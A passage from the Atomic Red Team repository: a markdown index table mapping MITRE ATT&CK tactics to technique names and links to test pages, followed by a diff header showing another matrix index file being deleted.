| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Plist File Modification](../../T1647/T1647.md) | | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/Matrices/matrix.md
-219
View File
@@ -1,219 +0,0 @@
# All Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | [Exfiltration Over Web Service](../../T1567/T1567.md) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
